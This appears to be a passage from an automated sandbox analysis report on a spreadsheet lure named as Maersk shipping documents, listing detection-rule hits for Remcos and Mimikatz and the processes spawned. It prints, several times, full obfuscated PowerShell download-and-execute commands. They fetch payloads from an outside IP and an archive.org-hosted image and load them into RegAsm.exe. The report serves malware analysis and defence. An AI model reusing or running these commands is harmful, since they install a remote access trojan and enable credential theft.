                    Source: 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 2476, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3932, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 3180, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Maersk BL, IN & PL.xlsOLE: Microsoft Excel 2007+
                    Source: Maersk BL, IN & PL.xlsOLE: Microsoft Excel 2007+
                    Source: 6E530000.0.drOLE: Microsoft Excel 2007+
                    Source: 6E530000.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\verynicepersonupdation[1].htaJump to behavior
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,26_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00401806 NtdllDefWindowProc_W,26_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004018C0 NtdllDefWindowProc_W,26_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004016FD NtdllDefWindowProc_A,28_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004017B7 NtdllDefWindowProc_A,28_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00402CAC NtdllDefWindowProc_A,29_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 29_2_00402D66 NtdllDefWindowProc_A,29_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,31_2_004167EF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89A4352E7_2_000007FE89A4352E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE89A42FCE14_2_000007FE89A42FCE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_1001719423_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_1000B5C123_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044B04026_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0043610D26_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044731026_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044A49026_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0040755A26_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0043C56026_2_0043C560
